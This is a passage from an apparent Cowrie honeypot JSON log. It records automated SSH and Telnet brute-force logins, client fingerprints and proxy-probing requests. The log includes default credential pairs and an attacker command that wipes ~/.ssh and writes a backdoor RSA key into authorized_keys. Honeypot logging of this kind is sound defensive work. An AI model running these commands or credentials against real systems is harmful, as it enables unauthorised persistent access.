openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:28:12.578450Z","src_ip":"212.227.235.229","session":"f5cde4f74f04"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:28:13.676929Z","src_ip":"212.227.235.229","session":"f5cde4f74f04"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:13.943084Z","src_ip":"212.227.235.229","session":"8a02e8012beb"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:13.943941Z","src_ip":"212.227.235.229","session":"f5cde4f74f04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47186,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad3785323828","protocol":"ssh","message":"New connection: 212.227.235.229:47186 (1.2.3.4:22) [session: ad3785323828]","sensor":"my-vps","timestamp":"2025-09-09T01:28:15.747353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:28:15.750307Z","src_ip":"212.227.235.229","session":"ad3785323828"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:28:15.976495Z","src_ip":"212.227.235.229","session":"ad3785323828"}
{"eventid":"cowrie.login.failed","username":"user1","password":"12345","message":"login attempt [user1/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T01:28:16.887170Z","src_ip":"212.227.235.229","session":"ad3785323828"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:18.117788Z","src_ip":"212.227.235.229","session":"ad3785323828"}
{"eventid":"cowrie.session.closed","duration":12.741415023803711,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:25.281820Z","src_ip":"212.227.235.229","session":"cc45ce4a0fa0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60992,"dst_ip":"1.2.3.4","dst_port":23,"session":"b589267d98f2","protocol":"telnet","message":"New connection: 212.227.235.229:60992 (1.2.3.4:23) [session: b589267d98f2]","sensor":"my-vps","timestamp":"2025-09-09T01:28:25.532237Z"}
{"eventid":"cowrie.session.closed","duration":12.794621229171753,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:38.326792Z","src_ip":"212.227.235.229","session":"b589267d98f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33073,"dst_ip":"1.2.3.4","dst_port":23,"session":"2a435fbec4a3","protocol":"telnet","message":"New connection: 212.227.235.229:33073 (1.2.3.4:23) [session: 2a435fbec4a3]","sensor":"my-vps","timestamp":"2025-09-09T01:28:38.615329Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47864,"dst_ip":"1.2.3.4","dst_port":22,"session":"85eca641f9b6","protocol":"ssh","message":"New connection: 212.227.235.229:47864 (1.2.3.4:22) [session: 85eca641f9b6]","sensor":"my-vps","timestamp":"2025-09-09T01:28:39.467598Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:28:39.468399Z","src_ip":"212.227.235.229","session":"85eca641f9b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:28:39.783636Z","src_ip":"212.227.235.229","session":"85eca641f9b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55822,"dst_ip":"1.2.3.4","dst_port":22,"session":"9efad2f6149e","protocol":"ssh","message":"New connection: 212.227.235.229:55822 (1.2.3.4:22) [session: 9efad2f6149e]","sensor":"my-vps","timestamp":"2025-09-09T01:28:40.638078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:28:40.638959Z","src_ip":"212.227.235.229","session":"9efad2f6149e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:28:40.883953Z","src_ip":"212.227.235.229","session":"9efad2f6149e"}
{"eventid":"cowrie.login.failed","username":"user1","password":"12345","message":"login attempt [user1/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T01:28:41.086398Z","src_ip":"212.227.235.229","session":"85eca641f9b6"}
{"eventid":"cowrie.login.success","username":"root","password":"huawei@1","message":"login attempt [root/huawei@1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:28:41.897429Z","src_ip":"212.227.235.229","session":"9efad2f6149e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:28:42.402222Z","src_ip":"212.227.235.229","session":"9efad2f6149e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:28:42.402910Z","src_ip":"212.227.235.229","session":"9efad2f6149e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:28:42.403980Z","src_ip":"212.227.235.229","session":"9efad2f6149e"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:42.405948Z","src_ip":"212.227.235.229","session":"85eca641f9b6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:42.647299Z","src_ip":"212.227.235.229","session":"9efad2f6149e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:28:43.228657Z","src_ip":"212.227.235.229","session":"9efad2f6149e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:28:43.229357Z","src_ip":"212.227.235.229","session":"9efad2f6149e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:28:43.480839Z","src_ip":"212.227.235.229","session":"9efad2f6149e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:43.481659Z","src_ip":"212.227.235.229","session":"9efad2f6149e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32978,"dst_ip":"1.2.3.4","dst_port":22,"session":"92b65cff1950","protocol":"ssh","message":"New connection: 212.227.235.229:32978 (1.2.3.4:22) [session: 92b65cff1950]","sensor":"my-vps","timestamp":"2025-09-09T01:28:43.717964Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:28:43.718577Z","src_ip":"212.227.235.229","session":"92b65cff1950"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:28:43.959749Z","src_ip":"212.227.235.229","session":"92b65cff1950"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37628,"dst_ip":"1.2.3.4","dst_port":22,"session":"583d30beb2e4","protocol":"ssh","message":"New connection: 212.227.235.229:37628 (1.2.3.4:22) [session: 583d30beb2e4]","sensor":"my-vps","timestamp":"2025-09-09T01:28:44.555714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:28:44.556587Z","src_ip":"212.227.235.229","session":"583d30beb2e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:28:44.815604Z","src_ip":"212.227.235.229","session":"583d30beb2e4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:28:44.967392Z","src_ip":"212.227.235.229","session":"92b65cff1950"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"Password1","message":"login attempt [postgres/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T01:28:45.896835Z","src_ip":"212.227.235.229","session":"583d30beb2e4"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:46.210922Z","src_ip":"212.227.235.229","session":"92b65cff1950"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32990,"dst_ip":"1.2.3.4","dst_port":22,"session":"c13edbefd5f9","protocol":"ssh","message":"New connection: 212.227.235.229:32990 (1.2.3.4:22) [session: c13edbefd5f9]","sensor":"my-vps","timestamp":"2025-09-09T01:28:46.452003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:28:46.453033Z","src_ip":"212.227.235.229","session":"c13edbefd5f9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:28:46.694929Z","src_ip":"212.227.235.229","session":"c13edbefd5f9"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:47.158537Z","src_ip":"212.227.235.229","session":"583d30beb2e4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:28:47.706033Z","src_ip":"212.227.235.229","session":"c13edbefd5f9"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:47.949591Z","src_ip":"212.227.235.229","session":"9efad2f6149e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:47.950535Z","src_ip":"212.227.235.229","session":"c13edbefd5f9"}
{"eventid":"cowrie.session.closed","duration":12.650811910629272,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:51.266058Z","src_ip":"212.227.235.229","session":"2a435fbec4a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33365,"dst_ip":"1.2.3.4","dst_port":23,"session":"703fc218f88c","protocol":"telnet","message":"New connection: 212.227.235.229:33365 (1.2.3.4:23) [session: 703fc218f88c]","sensor":"my-vps","timestamp":"2025-09-09T01:28:51.600369Z"}
{"eventid":"cowrie.session.connect","src_ip":"193.105.134.95","src_port":17704,"dst_ip":"1.2.3.4","dst_port":22,"session":"df297758e9bb","protocol":"ssh","message":"New connection: 193.105.134.95:17704 (1.2.3.4:22) [session: df297758e9bb]","sensor":"my-vps","timestamp":"2025-09-09T01:28:58.218755Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-paramiko_1.8.1","message":"Remote SSH version: SSH-2.0-paramiko_1.8.1","sensor":"my-vps","timestamp":"2025-09-09T01:28:58.219492Z","src_ip":"193.105.134.95","session":"df297758e9bb"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-09-09T01:28:58.263978Z","src_ip":"193.105.134.95","session":"df297758e9bb"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:28:59.163056Z","src_ip":"193.105.134.95","session":"df297758e9bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"193.105.134.95","src_port":21221,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:21221","sensor":"my-vps","timestamp":"2025-09-09T01:28:59.208503Z","session":"df297758e9bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T01:28:59.253178Z","src_ip":"193.105.134.95","session":"df297758e9bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"193.105.134.95","src_port":28649,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:28649","sensor":"my-vps","timestamp":"2025-09-09T01:28:59.382971Z","session":"df297758e9bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T01:28:59.427487Z","src_ip":"193.105.134.95","session":"df297758e9bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"193.105.134.95","src_port":19658,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:19658","sensor":"my-vps","timestamp":"2025-09-09T01:28:59.559031Z","session":"df297758e9bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T01:28:59.603638Z","src_ip":"193.105.134.95","session":"df297758e9bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"193.105.134.95","src_port":15101,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:15101","sensor":"my-vps","timestamp":"2025-09-09T01:28:59.734909Z","session":"df297758e9bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T01:28:59.779474Z","src_ip":"193.105.134.95","session":"df297758e9bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"193.105.134.95","src_port":20429,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:20429","sensor":"my-vps","timestamp":"2025-09-09T01:28:59.910860Z","session":"df297758e9bb"}
